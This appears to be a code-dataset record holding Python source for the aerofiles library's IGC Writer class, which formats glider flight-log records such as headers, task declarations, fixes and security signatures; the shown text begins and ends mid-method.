:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_security | python | def write_security(self, security, bytes_per_line=75):
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line]) | Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L641-L659 | [
"def write_record(self, type, record):\n self.write_line(type + record)\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
